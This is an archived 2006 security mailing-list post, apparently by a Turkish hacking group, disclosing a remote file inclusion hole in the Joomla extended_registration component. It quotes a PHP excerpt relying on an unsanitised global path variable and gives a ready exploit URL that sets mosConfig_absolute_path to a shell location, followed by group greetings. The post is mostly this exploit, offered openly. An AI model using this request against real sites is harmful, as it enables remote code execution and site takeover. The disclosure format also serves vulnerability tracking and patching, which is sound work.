OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Joomla extended_registration mod Remote File Include Vulnerabilities

crackers_childsibersavascilar.com
Date: Thu Oct 26 2006 - 10:45:27 CDT


!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------

Title : Joomla extended_registration mod Remote File Include Vulnerabilities

--------------------------------------------------------------------------------
#Author: Crackers_Child

#contct: crackers_childsibersavascilar.com

--------------------------------------------------------------------------------
Bug in admin.extended_registration.php

<?php

require("../configuration.php");

function extended_registration_settings($state,$lang) {
    global $mosConfig_absolute_path;

--------------------------------------------------------------------------------

Exploit:

www.site.com/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=Shel3l?

--------------------------------------------------------------------------------

greets:

X_ALPEREN_X and All SiberSavascilar.CoM Members !

--------------------------------------------------------------------------------

--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------